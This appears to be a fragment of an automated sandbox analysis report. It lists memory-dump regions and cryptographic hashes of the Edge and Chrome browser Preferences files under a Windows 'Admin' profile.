SHA512 6443c4d9e07059b032905863b108a62fb4d8749ae3afcdc746e92f7e3abaccadb4accc32dfad893d4bc926769a26beb4836e3c216e9e378342d22de38262f634

memory/3912-526-0x0000000003950000-0x0000000003A1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 95e6fb5db9e2ca61ea5b4309d1aff816
SHA1 87fd996b8afbc0c159925b6e7238835bba8f22dd
SHA256 bd8fa2732c22533fe8ec7e136276d787e411b664807b49cfe86503e49837186e
SHA512 179e514f84d59cbfbcf065172f662761c199927d41bc33ea0eded7067659e8f03beba1d5d1085a3c7e1997cb993119f3ea94076c9fa9ff7c84dd3c6fe7079b84

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 4a7b328f04beb47b6ac54bcf9d5ae4d3
SHA1 e45aa1edbb79c8148c55b647a9f62de6c961e4e1
SHA256 a5148b8448cd17b6eecf2c997f9cbb40ad8271ac55b0a0215b0c1a979289c850
SHA512 a37a30b3d0fa3770b9bfe92c56e8c5d1d05fd11707d4d16a38ef1fc320da848f447df4a52e34b1bff8a0322519a1dfbf833542ebc13a55a5e5751b1bf0ff36a6

memory/4916-564-0x00000000021A0000-0x0000000003FFC000-memory.dmp

memory/1648-585-0x00000000008B0000-0x0000000000F65000-memory.dmp

memory/3912-598-0x0000000000170000-0x0000000000825000-memory.dmp